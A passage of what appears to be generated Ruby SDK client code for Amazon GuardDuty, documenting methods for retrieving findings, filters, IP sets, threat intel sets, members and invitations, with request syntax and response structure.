#
# resp = client.get_filter({
# detector_id: "DetectorId", # required
# filter_name: "String", # required
# })
#
# @example Response structure
#
# resp.name #=> String
# resp.description #=> String
# resp.action #=> String, one of "NOOP", "ARCHIVE"
# resp.rank #=> Integer
# resp.finding_criteria.criterion #=> Hash
# resp.finding_criteria.criterion["String"].eq #=> Array
# resp.finding_criteria.criterion["String"].eq[0] #=> String
# resp.finding_criteria.criterion["String"].neq #=> Array
# resp.finding_criteria.criterion["String"].neq[0] #=> String
# resp.finding_criteria.criterion["String"].gt #=> Integer
# resp.finding_criteria.criterion["String"].gte #=> Integer
# resp.finding_criteria.criterion["String"].lt #=> Integer
# resp.finding_criteria.criterion["String"].lte #=> Integer
# resp.finding_criteria.criterion["String"].equals #=> Array
# resp.finding_criteria.criterion["String"].equals[0] #=> String
# resp.finding_criteria.criterion["String"].not_equals #=> Array
# resp.finding_criteria.criterion["String"].not_equals[0] #=> String
# resp.finding_criteria.criterion["String"].greater_than #=> Integer
# resp.finding_criteria.criterion["String"].greater_than_or_equal #=> Integer
# resp.finding_criteria.criterion["String"].less_than #=> Integer
# resp.finding_criteria.criterion["String"].less_than_or_equal #=> Integer
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetFilter AWS API Documentation
#
# @overload get_filter(params = {})
# @param [Hash] params ({})
def get_filter(params = {}, options = {})
req = build_request(:get_filter, params)
req.send_request(options)
end
# Describes Amazon GuardDuty findings specified by finding IDs.
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings you want to retrieve.
#
# @option params [required, Array<String>] :finding_ids
# The IDs of the findings that you want to retrieve.
#
# @option params [Types::SortCriteria] :sort_criteria
# Represents the criteria used for sorting findings.
#
# @return [Types::GetFindingsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetFindingsResponse#findings #findings} => Array<Types::Finding>
#
# @example Request syntax with placeholder values
#
# resp = client.get_findings({
# detector_id: "DetectorId", # required
# finding_ids: ["FindingId"], # required
# sort_criteria: {
# attribute_name: "String",
# order_by: "ASC", # accepts ASC, DESC
# },
# })
#
# @example Response structure
#
# resp.findings #=> Array
# resp.findings[0].account_id #=> String
# resp.findings[0].arn #=> String
# resp.findings[0].confidence #=> Float
# resp.findings[0].created_at #=> String
# resp.findings[0].description #=> String
# resp.findings[0].id #=> String
# resp.findings[0].partition #=> String
# resp.findings[0].region #=> String
# resp.findings[0].resource.access_key_details.access_key_id #=> String
# resp.findings[0].resource.access_key_details.principal_id #=> String
# resp.findings[0].resource.access_key_details.user_name #=> String
# resp.findings[0].resource.access_key_details.user_type #=> String
# resp.findings[0].resource.s3_bucket_details #=> Array
# resp.findings[0].resource.s3_bucket_details[0].arn #=> String
# resp.findings[0].resource.s3_bucket_details[0].name #=> String
# resp.findings[0].resource.s3_bucket_details[0].type #=> String
# resp.findings[0].resource.s3_bucket_details[0].created_at #=> Time
# resp.findings[0].resource.s3_bucket_details[0].owner.id #=> String
# resp.findings[0].resource.s3_bucket_details[0].tags #=> Array
# resp.findings[0].resource.s3_bucket_details[0].tags[0].key #=> String
# resp.findings[0].resource.s3_bucket_details[0].tags[0].value #=> String
# resp.findings[0].resource.s3_bucket_details[0].default_server_side_encryption.encryption_type #=> String
# resp.findings[0].resource.s3_bucket_details[0].default_server_side_encryption.kms_master_key_arn #=> String
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.access_control_list.allows_public_read_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.access_control_list.allows_public_write_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.bucket_policy.allows_public_read_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.bucket_policy.allows_public_write_access #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.ignore_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.restrict_public_buckets #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.block_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.bucket_level_permissions.block_public_access.block_public_policy #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.ignore_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.restrict_public_buckets #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.block_public_acls #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.permission_configuration.account_level_permissions.block_public_access.block_public_policy #=> Boolean
# resp.findings[0].resource.s3_bucket_details[0].public_access.effective_permission #=> String
# resp.findings[0].resource.instance_details.availability_zone #=> String
# resp.findings[0].resource.instance_details.iam_instance_profile.arn #=> String
# resp.findings[0].resource.instance_details.iam_instance_profile.id #=> String
# resp.findings[0].resource.instance_details.image_description #=> String
# resp.findings[0].resource.instance_details.image_id #=> String
# resp.findings[0].resource.instance_details.instance_id #=> String
# resp.findings[0].resource.instance_details.instance_state #=> String
# resp.findings[0].resource.instance_details.instance_type #=> String
# resp.findings[0].resource.instance_details.outpost_arn #=> String
# resp.findings[0].resource.instance_details.launch_time #=> String
# resp.findings[0].resource.instance_details.network_interfaces #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].ipv_6_addresses #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].ipv_6_addresses[0] #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].network_interface_id #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_dns_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_address #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_addresses #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_addresses[0].private_dns_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].private_ip_addresses[0].private_ip_address #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].public_dns_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].public_ip #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].security_groups #=> Array
# resp.findings[0].resource.instance_details.network_interfaces[0].security_groups[0].group_id #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].security_groups[0].group_name #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].subnet_id #=> String
# resp.findings[0].resource.instance_details.network_interfaces[0].vpc_id #=> String
# resp.findings[0].resource.instance_details.platform #=> String
# resp.findings[0].resource.instance_details.product_codes #=> Array
# resp.findings[0].resource.instance_details.product_codes[0].code #=> String
# resp.findings[0].resource.instance_details.product_codes[0].product_type #=> String
# resp.findings[0].resource.instance_details.tags #=> Array
# resp.findings[0].resource.instance_details.tags[0].key #=> String
# resp.findings[0].resource.instance_details.tags[0].value #=> String
# resp.findings[0].resource.resource_type #=> String
# resp.findings[0].schema_version #=> String
# resp.findings[0].service.action.action_type #=> String
# resp.findings[0].service.action.aws_api_call_action.api #=> String
# resp.findings[0].service.action.aws_api_call_action.caller_type #=> String
# resp.findings[0].service.action.aws_api_call_action.domain_details.domain #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.city.city_name #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.country.country_code #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.country.country_name #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.geo_location.lat #=> Float
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.geo_location.lon #=> Float
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.asn #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.asn_org #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.isp #=> String
# resp.findings[0].service.action.aws_api_call_action.remote_ip_details.organization.org #=> String
# resp.findings[0].service.action.aws_api_call_action.service_name #=> String
# resp.findings[0].service.action.dns_request_action.domain #=> String
# resp.findings[0].service.action.network_connection_action.blocked #=> Boolean
# resp.findings[0].service.action.network_connection_action.connection_direction #=> String
# resp.findings[0].service.action.network_connection_action.local_port_details.port #=> Integer
# resp.findings[0].service.action.network_connection_action.local_port_details.port_name #=> String
# resp.findings[0].service.action.network_connection_action.protocol #=> String
# resp.findings[0].service.action.network_connection_action.local_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.city.city_name #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.country.country_code #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.country.country_name #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.geo_location.lat #=> Float
# resp.findings[0].service.action.network_connection_action.remote_ip_details.geo_location.lon #=> Float
# resp.findings[0].service.action.network_connection_action.remote_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.asn #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.asn_org #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.isp #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.org #=> String
# resp.findings[0].service.action.network_connection_action.remote_port_details.port #=> Integer
# resp.findings[0].service.action.network_connection_action.remote_port_details.port_name #=> String
# resp.findings[0].service.action.port_probe_action.blocked #=> Boolean
# resp.findings[0].service.action.port_probe_action.port_probe_details #=> Array
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].local_port_details.port #=> Integer
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].local_port_details.port_name #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].local_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.city.city_name #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.country.country_code #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.country.country_name #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.geo_location.lat #=> Float
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.geo_location.lon #=> Float
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.asn #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.asn_org #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.isp #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.org #=> String
# resp.findings[0].service.evidence.threat_intelligence_details #=> Array
# resp.findings[0].service.evidence.threat_intelligence_details[0].threat_list_name #=> String
# resp.findings[0].service.evidence.threat_intelligence_details[0].threat_names #=> Array
# resp.findings[0].service.evidence.threat_intelligence_details[0].threat_names[0] #=> String
# resp.findings[0].service.archived #=> Boolean
# resp.findings[0].service.count #=> Integer
# resp.findings[0].service.detector_id #=> String
# resp.findings[0].service.event_first_seen #=> String
# resp.findings[0].service.event_last_seen #=> String
# resp.findings[0].service.resource_role #=> String
# resp.findings[0].service.service_name #=> String
# resp.findings[0].service.user_feedback #=> String
# resp.findings[0].severity #=> Float
# resp.findings[0].title #=> String
# resp.findings[0].type #=> String
# resp.findings[0].updated_at #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetFindings AWS API Documentation
#
# @overload get_findings(params = {})
# @param [Hash] params ({})
def get_findings(params = {}, options = {})
req = build_request(:get_findings, params)
req.send_request(options)
end
# Lists Amazon GuardDuty findings statistics for the specified detector
# ID.
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings' statistics you want to retrieve.
#
# @option params [required, Array<String>] :finding_statistic_types
# The types of finding statistics to retrieve.
#
# @option params [Types::FindingCriteria] :finding_criteria
# Represents the criteria that is used for querying findings.
#
# @return [Types::GetFindingsStatisticsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetFindingsStatisticsResponse#finding_statistics #finding_statistics} => Types::FindingStatistics
#
# @example Request syntax with placeholder values
#
# resp = client.get_findings_statistics({
# detector_id: "DetectorId", # required
# finding_statistic_types: ["COUNT_BY_SEVERITY"], # required, accepts COUNT_BY_SEVERITY
# finding_criteria: {
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# })
#
# @example Response structure
#
# resp.finding_statistics.count_by_severity #=> Hash
# resp.finding_statistics.count_by_severity["String"] #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetFindingsStatistics AWS API Documentation
#
# @overload get_findings_statistics(params = {})
# @param [Hash] params ({})
def get_findings_statistics(params = {}, options = {})
req = build_request(:get_findings_statistics, params)
req.send_request(options)
end
# Retrieves the IPSet specified by the `ipSetId`.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the IPSet is associated with.
#
# @option params [required, String] :ip_set_id
# The unique ID of the IPSet to retrieve.
#
# @return [Types::GetIPSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetIPSetResponse#name #name} => String
# * {Types::GetIPSetResponse#format #format} => String
# * {Types::GetIPSetResponse#location #location} => String
# * {Types::GetIPSetResponse#status #status} => String
# * {Types::GetIPSetResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.get_ip_set({
# detector_id: "DetectorId", # required
# ip_set_id: "String", # required
# })
#
# @example Response structure
#
# resp.name #=> String
# resp.format #=> String, one of "TXT", "STIX", "OTX_CSV", "ALIEN_VAULT", "PROOF_POINT", "FIRE_EYE"
# resp.location #=> String
# resp.status #=> String, one of "INACTIVE", "ACTIVATING", "ACTIVE", "DEACTIVATING", "ERROR", "DELETE_PENDING", "DELETED"
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetIPSet AWS API Documentation
#
# @overload get_ip_set(params = {})
# @param [Hash] params ({})
def get_ip_set(params = {}, options = {})
req = build_request(:get_ip_set, params)
req.send_request(options)
end
# Returns the count of all GuardDuty membership invitations that were
# sent to the current member account except the currently accepted
# invitation.
#
# @return [Types::GetInvitationsCountResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetInvitationsCountResponse#invitations_count #invitations_count} => Integer
#
# @example Response structure
#
# resp.invitations_count #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetInvitationsCount AWS API Documentation
#
# @overload get_invitations_count(params = {})
# @param [Hash] params ({})
def get_invitations_count(params = {}, options = {})
req = build_request(:get_invitations_count, params)
req.send_request(options)
end
# Provides the details for the GuardDuty master account associated with
# the current GuardDuty member account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty member account.
#
# @return [Types::GetMasterAccountResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetMasterAccountResponse#master #master} => Types::Master
#
# @example Request syntax with placeholder values
#
# resp = client.get_master_account({
# detector_id: "DetectorId", # required
# })
#
# @example Response structure
#
# resp.master.account_id #=> String
# resp.master.invitation_id #=> String
# resp.master.relationship_status #=> String
# resp.master.invited_at #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetMasterAccount AWS API Documentation
#
# @overload get_master_account(params = {})
# @param [Hash] params ({})
def get_master_account(params = {}, options = {})
req = build_request(:get_master_account, params)
req.send_request(options)
end
# Retrieves GuardDuty member accounts (to the current GuardDuty master
# account) specified by the account IDs.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account whose members
# you want to retrieve.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts that you want
# to describe.
#
# @return [Types::GetMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetMembersResponse#members #members} => Array<Types::Member>
# * {Types::GetMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.get_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.members #=> Array
# resp.members[0].account_id #=> String
# resp.members[0].detector_id #=> String
# resp.members[0].master_id #=> String
# resp.members[0].email #=> String
# resp.members[0].relationship_status #=> String
# resp.members[0].invited_at #=> String
# resp.members[0].updated_at #=> String
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetMembers AWS API Documentation
#
# @overload get_members(params = {})
# @param [Hash] params ({})
def get_members(params = {}, options = {})
req = build_request(:get_members, params)
req.send_request(options)
end
# Retrieves the ThreatIntelSet that is specified by the ThreatIntelSet
# ID.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the threatIntelSet is associated
# with.
#
# @option params [required, String] :threat_intel_set_id
# The unique ID of the threatIntelSet that you want to get.
#
# @return [Types::GetThreatIntelSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetThreatIntelSetResponse#name #name} => String
# * {Types::GetThreatIntelSetResponse#format #format} => String
# * {Types::GetThreatIntelSetResponse#location #location} => String
# * {Types::GetThreatIntelSetResponse#status #status} => String
# * {Types::GetThreatIntelSetResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.get_threat_intel_set({
# detector_id: "DetectorId", # required
# threat_intel_set_id: "String", # required
# })
#
# @example Response structure
#
# resp.name #=> String
# resp.format #=> String, one of "TXT", "STIX", "OTX_CSV", "ALIEN_VAULT", "PROOF_POINT", "FIRE_EYE"
# resp.location #=> String
# resp.status #=> String, one of "INACTIVE", "ACTIVATING", "ACTIVE", "DEACTIVATING", "ERROR", "DELETE_PENDING", "DELETED"
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetThreatIntelSet AWS API Documentation
#
# @overload get_threat_intel_set(params = {})
# @param [Hash] params ({})
def get_threat_intel_set(params = {}, options = {})
req = build_request(:get_threat_intel_set, params)
req.send_request(options)
end
# Invites other AWS accounts (created as members of the current AWS
# account by CreateMembers) to enable GuardDuty, and allow the current
# AWS account to view and manage these accounts' GuardDuty findings on
# their behalf as the master account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to invite members with.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the accounts that you want to invite to
# GuardDuty as members.
#
# @option params [Boolean] :disable_email_notification
# A Boolean value that specifies whether you want to disable email
# notification to the accounts that you’re inviting to GuardDuty as
# members.
#
# @option params [String] :message
# The invitation message that you want to send to the accounts that
# you’re inviting to GuardDuty as members.
#
# @return [Types::InviteMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::InviteMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.invite_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# disable_email_notification: false,
# message: "String",
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/InviteMembers AWS API Documentation
#
# @overload invite_members(params = {})
# @param [Hash] params ({})
def invite_members(params = {}, options = {})
req = build_request(:invite_members, params)
req.send_request(options)
end
# Lists detectorIds of all the existing Amazon GuardDuty detector
# resources.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListDetectorsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListDetectorsResponse#detector_ids #detector_ids} => Array<String>
# * {Types::ListDetectorsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_detectors({
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.detector_ids #=> Array
# resp.detector_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListDetectors AWS API Documentation
#
# @overload list_detectors(params = {})
# @param [Hash] params ({})
def list_detectors(params = {}, options = {})
req = build_request(:list_detectors, params)
req.send_request(options)
end
# Returns a paginated list of the current filters.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the filter is associated with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListFiltersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListFiltersResponse#filter_names #filter_names} => Array<String>
# * {Types::ListFiltersResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_filters({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.filter_names #=> Array
# resp.filter_names[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListFilters AWS API Documentation
#
# @overload list_filters(params = {})
# @param [Hash] params ({})
def list_filters(params = {}, options = {})
req = build_request(:list_filters, params)
req.send_request(options)
end
# Lists Amazon GuardDuty findings for the specified detector ID.
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings you want to list.
#
# @option params [Types::FindingCriteria] :finding_criteria
# Represents the criteria used for querying findings. Valid values
# include:
#
# * JSON field name
#
# * accountId
#
# * region
#
# * confidence
#
# * id
#
# * resource.accessKeyDetails.accessKeyId
#
# * resource.accessKeyDetails.principalId
#
# * resource.accessKeyDetails.userName
#
# * resource.accessKeyDetails.userType
#
# * resource.instanceDetails.iamInstanceProfile.id
#
# * resource.instanceDetails.imageId
#
# * resource.instanceDetails.instanceId
#
# * resource.instanceDetails.networkInterfaces.ipv6Addresses
#
# * resource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress
#
# * resource.instanceDetails.networkInterfaces.publicDnsName
#
# * resource.instanceDetails.networkInterfaces.publicIp
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupId
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupName
#
# * resource.instanceDetails.networkInterfaces.subnetId
#
# * resource.instanceDetails.networkInterfaces.vpcId
#
# * resource.instanceDetails.tags.key
#
# * resource.instanceDetails.tags.value
#
# * resource.resourceType
#
# * service.action.actionType
#
# * service.action.awsApiCallAction.api
#
# * service.action.awsApiCallAction.callerType
#
# * service.action.awsApiCallAction.remoteIpDetails.city.cityName
#
# * service.action.awsApiCallAction.remoteIpDetails.country.countryName
#
# * service.action.awsApiCallAction.remoteIpDetails.ipAddressV4
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asn
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asnOrg
#
# * service.action.awsApiCallAction.serviceName
#
# * service.action.dnsRequestAction.domain
#
# * service.action.networkConnectionAction.blocked
#
# * service.action.networkConnectionAction.connectionDirection
#
# * service.action.networkConnectionAction.localPortDetails.port
#
# * service.action.networkConnectionAction.protocol
#
# * service.action.networkConnectionAction.remoteIpDetails.city.cityName
#
# * service.action.networkConnectionAction.remoteIpDetails.country.countryName
#
# * service.action.networkConnectionAction.remoteIpDetails.ipAddressV4
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asn
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asnOrg
#
# * service.action.networkConnectionAction.remotePortDetails.port
#
# * service.additionalInfo.threatListName
#
# * service.archived
#
# When this attribute is set to 'true', only archived findings are
# listed. When it's set to 'false', only unarchived findings are
# listed. When this attribute is not set, all existing findings are
# listed.
#
# * service.resourceRole
#
# * severity
#
# * type
#
# * updatedAt
#
# Type: Timestamp in Unix Epoch millisecond format: 1486685375000
#
# @option params [Types::SortCriteria] :sort_criteria
# Represents the criteria used for sorting findings.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items you
# want in the response. The default value is 50. The maximum value is
# 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListFindingsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListFindingsResponse#finding_ids #finding_ids} => Array<String>
# * {Types::ListFindingsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_findings({
# detector_id: "DetectorId", # required
# finding_criteria: {
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# sort_criteria: {
# attribute_name: "String",
# order_by: "ASC", # accepts ASC, DESC
# },
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.finding_ids #=> Array
# resp.finding_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListFindings AWS API Documentation
#
# @overload list_findings(params = {})
# @param [Hash] params ({})
def list_findings(params = {}, options = {})
req = build_request(:list_findings, params)
req.send_request(options)
end
# Lists the IPSets of the GuardDuty service specified by the detector
# ID. If you use this operation from a member account, the IPSets
# returned are the IPSets from the associated master account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the IPSet is associated with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items you
# want in the response. The default value is 50. The maximum value is
# 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListIPSetsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListIPSetsResponse#ip_set_ids #ip_set_ids} => Array<String>
# * {Types::ListIPSetsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_ip_sets({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.ip_set_ids #=> Array
# resp.ip_set_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListIPSets AWS API Documentation
#
# @overload list_ip_sets(params = {})
# @param [Hash] params ({})
def list_ip_sets(params = {}, options = {})
req = build_request(:list_ip_sets, params)
req.send_request(options)
end
# Lists all GuardDuty membership invitations that were sent to the
# current AWS account.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListInvitationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListInvitationsResponse#invitations #invitations} => Array<Types::Invitation>
# * {Types::ListInvitationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_invitations({
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.invitations #=> Array
# resp.invitations[0].account_id #=> String
# resp.invitations[0].invitation_id #=> String
# resp.invitations[0].relationship_status #=> String
# resp.invitations[0].invited_at #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListInvitations AWS API Documentation
#
# @overload list_invitations(params = {})
# @param [Hash] params ({})
